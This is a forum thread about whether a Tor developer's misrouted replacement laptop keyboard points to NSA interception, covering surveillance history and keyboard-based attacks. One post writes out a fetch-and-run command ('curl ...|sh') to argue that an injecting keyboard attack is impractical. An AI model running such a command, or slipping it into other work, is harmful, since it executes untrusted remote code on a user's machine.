Earlier quoted context omitted.
> You were anomalously naive. Now that type of thinking I find naive.
If you had to break the last 20 years into three time periods: (!) "post Snowden", (2) "post-9/11", and (3) "post PGP", sensitivity to government surveillance would rank 1-3-2. The NSA was a bigger deal in the 1990s than it was in the 2000s, even after the AT&T "Room 101" disclosure.
Did this Tor developer become a victim of NSA's laptop interception program?
161–169 of 169 posts
Re: Did this Tor developer become a victim of NSA's laptop interception program?
#162Earlier quoted context omitted.
My point was that the modified keyboard alone couldn't do it. It's not a FireWire device that can read/write things from/to memory however it pleases, insta-pwning a computer as soon as it's connected (unless something like VT-d is being used to contain DMA transfers). It's not even a USB device that could abuse some poorly written driver to gain access. If a hypothetical modified keyboard is logging keystrokes, some…
What would you need DMA for? Here's a fun thought exercise for you, since my first reply didn't spark one. Imagine you're an evil keyboard. What evil could you accomplish? Hint: you don't even need your own radio, the computer's already got one.
An autonomously malicious PS/2 keyboard, on the other hand, is on the end of a slow (~12 kbit/s) serial interface. It can only simulate keypresses and receive updates about the keyboard LEDs' statuses. It doesn't know the current state of the system. It's as likely to type "curl http://innocent-looking.org/logo.jpg|sh" in a text editor as it is at a command prompt, so it can't type anything autonomously without running the (huge) risk of alerting its owner to its presence.
Edit: The "Reversing and exploiting an Apple firmware update" paper linked below talks about persisting a rootkit on a computer by using Spotlight to open Terminal, then typing a command to download and execute a payload. That runs the same risk of alerting the user to its presence, and it will completely fail if the user has remapped Cmd-Space to something else.
Re: Did this Tor developer become a victim of NSA's laptop interception program?
#163Earlier quoted context omitted.
> No we did not. The disdain with which you discard my memories of that time is... interesting. Invent distrust? Of course not. However, I and my colleagues (as I recall), at the time just did not take the threat of government surveillance seriously. Did I trust the government? Yes. Yes I did. I'm Dutch. We have a childlike faith in our government. Being spied on by the government was something that happened on the o…
You weren't just naive. You were anomalously naive. It's funny you should mention PGP: the 1990s were the time of the crypto-wars, which were in part sparked by PGP. Remember "this t-shirt is a munition"? You couldn't even sell products with crypto in them without jumping through hoops.
there was some support for the projects (the PGP source scanning thing, extra-US hosting of crypto software, ...), but other than that, this was the US being stupidly paranoid as usual.
That "you" couldn't sell products with crypto in them was a great business opportunity for a number of European vendors, by the way.
Re: Did this Tor developer become a victim of NSA's laptop interception program?
#164Earlier quoted context omitted.
The intelligence agency whose massive scope and pervasive operational shortcomings were recently exposed by one low-level operative had a slip-up in applying a well-publicized tactic to an obviously high value target. A few comments: • This "low-level operative" was a system administrator who used social engineering to obtain other people's authentication credentials and gain access to material to which he wasn't aut…
That generated more response than I expected. I actually do agree that, on balance, it's somewhat more likely that it's just a benign glitch; I should have said that. What I was really taking issue with is the dismissiveness with you treated the suggestion that this might be an NSA attack. I was responding to what I saw as a slanted and unreasonable framing by doing the same thing from the other end. So with less sna…
I was dismissing the linked blog post as much as the suggestion of NSA involvement. The blog post took a single tweet with a single screenshot, screwed up half the facts ("tracking details for a computer Shepard ordered" — uh, no, it was a used laptop keyboard), sensationalized the other half ("it moved another four times around the military and industrial belt" — uh, no, it moved from IAD to Alexandria), and tacked a pile of rhetorical questions and conjecture on the end.
I somehow expected better from an ACLU chapter.
Re: Did this Tor developer become a victim of NSA's laptop interception program?
#165HEY, KIDS! Do YOU know what time it is?! [wild audience applause] THAT'S RIGHT, it's time for WHICH IS MORE LIKELY? ! [intro music] Today on Which is More Likely? , we're looking at a replacement Lenovo Thinkpad keyboard that was shipped to Alexandria, Virginia, instead of Seattle, Washington. What a blunder! [slide whistle sound effect] Now put your thinking caps on and ponder, WHICH IS MORE LIKELY? ! • The largest…
You are asking which is more likely. I.e. is the probability of compromise higher than 50% ? I'd say the the probability is less than that. But I think even risks with lower than half probability are worth worrying about.
But there's a different direction to look at it from: What is the probability that someone's laptop was compromised by the NSA?
This is approaching 100%: we know that they do this.
Re: Did this Tor developer become a victim of NSA's laptop interception program?
#166Re: Did this Tor developer become a victim of NSA's laptop interception program?
#167Earlier quoted context omitted.
The intelligence agency whose massive scope and pervasive operational shortcomings were recently exposed by one low-level operative had a slip-up in applying a well-publicized tactic to an obviously high value target. A few comments: • This "low-level operative" was a system administrator who used social engineering to obtain other people's authentication credentials and gain access to material to which he wasn't aut…
All good points, and I'd second that Andrea is unlikely to be a "high value target" [BTW, curious, who is building and releasing Tor binaries and Tor dependencies binaries?]. Still, as a developer she is a Tor user and it is possible that NSA opportunistically targets all Tor users. And even if not, I'm still finding it distasteful that NSA can legally intercept post and put up dragnet surveillance. It feels like the…
Re: Did this Tor developer become a victim of NSA's laptop interception program?
#168I wonder what she's going to do with the keyboard when she gets it. Send it back and buy one locally? Examine it in detail for bugs/weirdness, and then use it normally? Connect it to a spare laptop, and use it to do searches for the weirdest porn you can think of?
Re: Did this Tor developer become a victim of NSA's laptop interception program?
#169When I read the headline, and the comments here before reading the article, I was expecting to see tracking data that went from the seller to the buyer with a mysterious stop near the NSA. Then I read the article. The tacking data shows a delivery to a destination near the NSA. Does anyone here seriously think that the mechanism the NSA uses if they want to tamper with a laptop on the way to simply change the destina…
Genuinely curious about the Modern Marvels episode. Do you remember the exact name or season? I couldn't find it on iTunes.
BTW, UPS would be particularly good for intercepts, because UPS operates an electronics repair facility that does factory authorized repairs. When you think you are sending your broken laptop by UPS to, say, Toshiba, it can get automatically diverted to the UPS repair facility a couple miles from the hub, where Toshiba-trained technicians do the repair.
This means that a laptop shipment being diversion for the NSA would not even have to be done with some secret diverter on the line somewhere. They could just make it look like an ordinary repair job. The repair facility is large. Who would know if one or two of the repair technicians are really NSA agents?